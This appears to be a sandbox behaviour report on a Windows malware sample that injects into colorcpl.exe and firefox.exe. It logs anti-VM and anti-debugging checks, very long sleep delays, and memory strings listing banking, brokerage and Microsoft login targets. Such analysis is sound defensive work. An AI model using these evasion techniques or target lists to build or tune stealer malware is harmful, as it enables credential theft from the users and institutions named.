Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: 18in SPA-198-2024.exe PID: 6200, type: MEMORYSTR

Switches to a custom stack to bypass stack traces

Source: C:\Windows\SysWOW64\colorcpl.exe	API/Special instruction interceptor: Address: 7FF8C88ED324
Source: C:\Windows\SysWOW64\colorcpl.exe	API/Special instruction interceptor: Address: 7FF8C88ED7E4
Source: C:\Windows\SysWOW64\colorcpl.exe	API/Special instruction interceptor: Address: 7FF8C88ED944
Source: C:\Windows\SysWOW64\colorcpl.exe	API/Special instruction interceptor: Address: 7FF8C88ED504
Source: C:\Windows\SysWOW64\colorcpl.exe	API/Special instruction interceptor: Address: 7FF8C88ED544
Source: C:\Windows\SysWOW64\colorcpl.exe	API/Special instruction interceptor: Address: 7FF8C88ED1E4
Source: C:\Windows\SysWOW64\colorcpl.exe	API/Special instruction interceptor: Address: 7FF8C88F0154
Source: C:\Windows\SysWOW64\colorcpl.exe	API/Special instruction interceptor: Address: 7FF8C88EDA44

Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Memory allocated: B40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Memory allocated: 25A0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Memory allocated: 23B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Memory allocated: 8AB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Memory allocated: 9AB0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Memory allocated: 9CC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Memory allocated: ACC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Memory allocated: B0E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Memory allocated: C0E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Memory allocated: D0E0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\18in SPA-198-2024.exe

Code function: 4_2_0125096E rdtsc

4_2_0125096E

Source: C:\Users\user\Desktop\18in SPA-198-2024.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: C:\Windows\SysWOW64\colorcpl.exe	Window / User API: threadDelayed 1164			Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Window / User API: threadDelayed 8809			Jump to behavior

Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	API coverage: 0.7 %
Source: C:\Windows\SysWOW64\colorcpl.exe	API coverage: 2.7 %

Source: C:\Users\user\Desktop\18in SPA-198-2024.exe TID: 6084	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe TID: 1992	Thread sleep count: 1164 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe TID: 1992	Thread sleep time: -2328000s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe TID: 1992	Thread sleep count: 8809 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe TID: 1992	Thread sleep time: -17618000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe TID: 360	Thread sleep time: -80000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe TID: 360	Thread sleep count: 38 > 30	Jump to behavior
Source: C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe TID: 360	Thread sleep time: -57000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe TID: 360	Thread sleep count: 40 > 30	Jump to behavior
Source: C:\Program Files (x86)\JGsUfsfkLEFnOUVXpIEOrlgysqKPOBUvlJcqviynHOcrBjfmZdhmJJBY\tWcBthnLrDi.exe TID: 360	Thread sleep time: -40000s >= -30000s	Jump to behavior

Source: C:\Windows\SysWOW64\colorcpl.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\colorcpl.exe	Last function: Thread delayed

Source: C:\Windows\SysWOW64\colorcpl.exe

Code function: 7_2_0330C3B0 FindFirstFileW,FindNextFileW,FindClose,

7_2_0330C3B0

Source: C:\Users\user\Desktop\18in SPA-198-2024.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: tWcBthnLrDi.exe, 00000008.00000002.4472218440.000000000147F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllW
Source: Ea64OHKq.7.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: Ea64OHKq.7.dr	Binary or memory string: discord.comVMware20,11696428655f
Source: Ea64OHKq.7.dr	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: Ea64OHKq.7.dr	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: Ea64OHKq.7.dr	Binary or memory string: global block list test formVMware20,11696428655
Source: Ea64OHKq.7.dr	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: Ea64OHKq.7.dr	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: Ea64OHKq.7.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: Ea64OHKq.7.dr	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: Ea64OHKq.7.dr	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: Ea64OHKq.7.dr	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: Ea64OHKq.7.dr	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: Ea64OHKq.7.dr	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: Ea64OHKq.7.dr	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: Ea64OHKq.7.dr	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: colorcpl.exe, 00000007.00000002.4471538704.00000000033DD000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Ea64OHKq.7.dr	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: Ea64OHKq.7.dr	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: firefox.exe, 00000009.00000002.2559807774.00000216144DC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll{{
Source: Ea64OHKq.7.dr	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: Ea64OHKq.7.dr	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: Ea64OHKq.7.dr	Binary or memory string: AMC password management pageVMware20,11696428655
Source: Ea64OHKq.7.dr	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: Ea64OHKq.7.dr	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: Ea64OHKq.7.dr	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: Ea64OHKq.7.dr	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: Ea64OHKq.7.dr	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: Ea64OHKq.7.dr	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: Ea64OHKq.7.dr	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: Ea64OHKq.7.dr	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: Ea64OHKq.7.dr	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: Ea64OHKq.7.dr	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: Ea64OHKq.7.dr	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Users\user\Desktop\18in SPA-198-2024.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\colorcpl.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Users\user\Desktop\18in SPA-198-2024.exe

Code function: 4_2_0125096E rdtsc

4_2_0125096E

Source: C:\Users\user\Desktop\18in SPA-198-2024.exe

Code function: 4_2_00417563 LdrLoadDll,

4_2_00417563

Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01240124 mov eax, dword ptr fs:[00000030h]	4_2_01240124
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012BE10E mov eax, dword ptr fs:[00000030h]	4_2_012BE10E
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012BE10E mov ecx, dword ptr fs:[00000030h]	4_2_012BE10E
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012BE10E mov eax, dword ptr fs:[00000030h]	4_2_012BE10E
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012BE10E mov eax, dword ptr fs:[00000030h]	4_2_012BE10E
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012BE10E mov ecx, dword ptr fs:[00000030h]	4_2_012BE10E
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012BE10E mov eax, dword ptr fs:[00000030h]	4_2_012BE10E
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012BE10E mov eax, dword ptr fs:[00000030h]	4_2_012BE10E
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012BE10E mov ecx, dword ptr fs:[00000030h]	4_2_012BE10E
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012BE10E mov eax, dword ptr fs:[00000030h]	4_2_012BE10E
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012BE10E mov ecx, dword ptr fs:[00000030h]	4_2_012BE10E
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012BA118 mov ecx, dword ptr fs:[00000030h]	4_2_012BA118
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012BA118 mov eax, dword ptr fs:[00000030h]	4_2_012BA118
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012BA118 mov eax, dword ptr fs:[00000030h]	4_2_012BA118
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012BA118 mov eax, dword ptr fs:[00000030h]	4_2_012BA118
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012D0115 mov eax, dword ptr fs:[00000030h]	4_2_012D0115
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012E4164 mov eax, dword ptr fs:[00000030h]	4_2_012E4164
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012E4164 mov eax, dword ptr fs:[00000030h]	4_2_012E4164
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012A4144 mov eax, dword ptr fs:[00000030h]	4_2_012A4144
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012A4144 mov eax, dword ptr fs:[00000030h]	4_2_012A4144
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012A4144 mov ecx, dword ptr fs:[00000030h]	4_2_012A4144
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012A4144 mov eax, dword ptr fs:[00000030h]	4_2_012A4144
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012A4144 mov eax, dword ptr fs:[00000030h]	4_2_012A4144
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012A8158 mov eax, dword ptr fs:[00000030h]	4_2_012A8158
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01216154 mov eax, dword ptr fs:[00000030h]	4_2_01216154
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01216154 mov eax, dword ptr fs:[00000030h]	4_2_01216154
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0120C156 mov eax, dword ptr fs:[00000030h]	4_2_0120C156
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01250185 mov eax, dword ptr fs:[00000030h]	4_2_01250185
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012CC188 mov eax, dword ptr fs:[00000030h]	4_2_012CC188
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012CC188 mov eax, dword ptr fs:[00000030h]	4_2_012CC188
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012B4180 mov eax, dword ptr fs:[00000030h]	4_2_012B4180
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012B4180 mov eax, dword ptr fs:[00000030h]	4_2_012B4180
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0129019F mov eax, dword ptr fs:[00000030h]	4_2_0129019F
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0129019F mov eax, dword ptr fs:[00000030h]	4_2_0129019F
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0129019F mov eax, dword ptr fs:[00000030h]	4_2_0129019F
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0129019F mov eax, dword ptr fs:[00000030h]	4_2_0129019F
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0120A197 mov eax, dword ptr fs:[00000030h]	4_2_0120A197
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0120A197 mov eax, dword ptr fs:[00000030h]	4_2_0120A197
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0120A197 mov eax, dword ptr fs:[00000030h]	4_2_0120A197
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012E61E5 mov eax, dword ptr fs:[00000030h]	4_2_012E61E5
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012401F8 mov eax, dword ptr fs:[00000030h]	4_2_012401F8
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012D61C3 mov eax, dword ptr fs:[00000030h]	4_2_012D61C3
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012D61C3 mov eax, dword ptr fs:[00000030h]	4_2_012D61C3
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0128E1D0 mov eax, dword ptr fs:[00000030h]	4_2_0128E1D0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0128E1D0 mov eax, dword ptr fs:[00000030h]	4_2_0128E1D0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0128E1D0 mov ecx, dword ptr fs:[00000030h]	4_2_0128E1D0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0128E1D0 mov eax, dword ptr fs:[00000030h]	4_2_0128E1D0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0128E1D0 mov eax, dword ptr fs:[00000030h]	4_2_0128E1D0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0120A020 mov eax, dword ptr fs:[00000030h]	4_2_0120A020
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0120C020 mov eax, dword ptr fs:[00000030h]	4_2_0120C020
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012A6030 mov eax, dword ptr fs:[00000030h]	4_2_012A6030
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01294000 mov ecx, dword ptr fs:[00000030h]	4_2_01294000
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012B2000 mov eax, dword ptr fs:[00000030h]	4_2_012B2000
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012B2000 mov eax, dword ptr fs:[00000030h]	4_2_012B2000
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012B2000 mov eax, dword ptr fs:[00000030h]	4_2_012B2000
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012B2000 mov eax, dword ptr fs:[00000030h]	4_2_012B2000
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012B2000 mov eax, dword ptr fs:[00000030h]	4_2_012B2000
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012B2000 mov eax, dword ptr fs:[00000030h]	4_2_012B2000
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012B2000 mov eax, dword ptr fs:[00000030h]	4_2_012B2000
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012B2000 mov eax, dword ptr fs:[00000030h]	4_2_012B2000
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0122E016 mov eax, dword ptr fs:[00000030h]	4_2_0122E016
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0122E016 mov eax, dword ptr fs:[00000030h]	4_2_0122E016
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0122E016 mov eax, dword ptr fs:[00000030h]	4_2_0122E016
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0122E016 mov eax, dword ptr fs:[00000030h]	4_2_0122E016
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0123C073 mov eax, dword ptr fs:[00000030h]	4_2_0123C073
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01212050 mov eax, dword ptr fs:[00000030h]	4_2_01212050
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01296050 mov eax, dword ptr fs:[00000030h]	4_2_01296050
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012A80A8 mov eax, dword ptr fs:[00000030h]	4_2_012A80A8
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012D60B8 mov eax, dword ptr fs:[00000030h]	4_2_012D60B8
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012D60B8 mov ecx, dword ptr fs:[00000030h]	4_2_012D60B8
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0121208A mov eax, dword ptr fs:[00000030h]	4_2_0121208A
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0120A0E3 mov ecx, dword ptr fs:[00000030h]	4_2_0120A0E3
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012180E9 mov eax, dword ptr fs:[00000030h]	4_2_012180E9
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012960E0 mov eax, dword ptr fs:[00000030h]	4_2_012960E0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0120C0F0 mov eax, dword ptr fs:[00000030h]	4_2_0120C0F0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012520F0 mov ecx, dword ptr fs:[00000030h]	4_2_012520F0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012920DE mov eax, dword ptr fs:[00000030h]	4_2_012920DE
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0124A30B mov eax, dword ptr fs:[00000030h]	4_2_0124A30B
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0124A30B mov eax, dword ptr fs:[00000030h]	4_2_0124A30B
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0124A30B mov eax, dword ptr fs:[00000030h]	4_2_0124A30B
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0120C310 mov ecx, dword ptr fs:[00000030h]	4_2_0120C310
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01230310 mov ecx, dword ptr fs:[00000030h]	4_2_01230310
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012B437C mov eax, dword ptr fs:[00000030h]	4_2_012B437C
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01292349 mov eax, dword ptr fs:[00000030h]	4_2_01292349
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01292349 mov eax, dword ptr fs:[00000030h]	4_2_01292349
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01292349 mov eax, dword ptr fs:[00000030h]	4_2_01292349
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01292349 mov eax, dword ptr fs:[00000030h]	4_2_01292349
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01292349 mov eax, dword ptr fs:[00000030h]	4_2_01292349
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01292349 mov eax, dword ptr fs:[00000030h]	4_2_01292349
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01292349 mov eax, dword ptr fs:[00000030h]	4_2_01292349
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01292349 mov eax, dword ptr fs:[00000030h]	4_2_01292349
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01292349 mov eax, dword ptr fs:[00000030h]	4_2_01292349
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01292349 mov eax, dword ptr fs:[00000030h]	4_2_01292349
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01292349 mov eax, dword ptr fs:[00000030h]	4_2_01292349
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01292349 mov eax, dword ptr fs:[00000030h]	4_2_01292349
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01292349 mov eax, dword ptr fs:[00000030h]	4_2_01292349
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01292349 mov eax, dword ptr fs:[00000030h]	4_2_01292349
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01292349 mov eax, dword ptr fs:[00000030h]	4_2_01292349
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0129035C mov eax, dword ptr fs:[00000030h]	4_2_0129035C
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0129035C mov eax, dword ptr fs:[00000030h]	4_2_0129035C
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0129035C mov eax, dword ptr fs:[00000030h]	4_2_0129035C
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0129035C mov ecx, dword ptr fs:[00000030h]	4_2_0129035C
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0129035C mov eax, dword ptr fs:[00000030h]	4_2_0129035C
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0129035C mov eax, dword ptr fs:[00000030h]	4_2_0129035C
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012B8350 mov ecx, dword ptr fs:[00000030h]	4_2_012B8350
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012DA352 mov eax, dword ptr fs:[00000030h]	4_2_012DA352
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0120E388 mov eax, dword ptr fs:[00000030h]	4_2_0120E388
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0120E388 mov eax, dword ptr fs:[00000030h]	4_2_0120E388
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0120E388 mov eax, dword ptr fs:[00000030h]	4_2_0120E388
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0123438F mov eax, dword ptr fs:[00000030h]	4_2_0123438F
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0123438F mov eax, dword ptr fs:[00000030h]	4_2_0123438F
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01208397 mov eax, dword ptr fs:[00000030h]	4_2_01208397
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01208397 mov eax, dword ptr fs:[00000030h]	4_2_01208397
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_01208397 mov eax, dword ptr fs:[00000030h]	4_2_01208397
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012203E9 mov eax, dword ptr fs:[00000030h]	4_2_012203E9
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012203E9 mov eax, dword ptr fs:[00000030h]	4_2_012203E9
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012203E9 mov eax, dword ptr fs:[00000030h]	4_2_012203E9
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012203E9 mov eax, dword ptr fs:[00000030h]	4_2_012203E9
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012203E9 mov eax, dword ptr fs:[00000030h]	4_2_012203E9
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012203E9 mov eax, dword ptr fs:[00000030h]	4_2_012203E9
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012203E9 mov eax, dword ptr fs:[00000030h]	4_2_012203E9
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012203E9 mov eax, dword ptr fs:[00000030h]	4_2_012203E9
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0122E3F0 mov eax, dword ptr fs:[00000030h]	4_2_0122E3F0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0122E3F0 mov eax, dword ptr fs:[00000030h]	4_2_0122E3F0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0122E3F0 mov eax, dword ptr fs:[00000030h]	4_2_0122E3F0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012463FF mov eax, dword ptr fs:[00000030h]	4_2_012463FF
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_012CC3CD mov eax, dword ptr fs:[00000030h]	4_2_012CC3CD
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0121A3C0 mov eax, dword ptr fs:[00000030h]	4_2_0121A3C0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0121A3C0 mov eax, dword ptr fs:[00000030h]	4_2_0121A3C0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0121A3C0 mov eax, dword ptr fs:[00000030h]	4_2_0121A3C0
Source: C:\Users\user\Desktop\18in SPA-198-2024.exe	Code function: 4_2_0121A3C0 mov eax, dword ptr fs:[00000030h]	4_2_0121A3C0
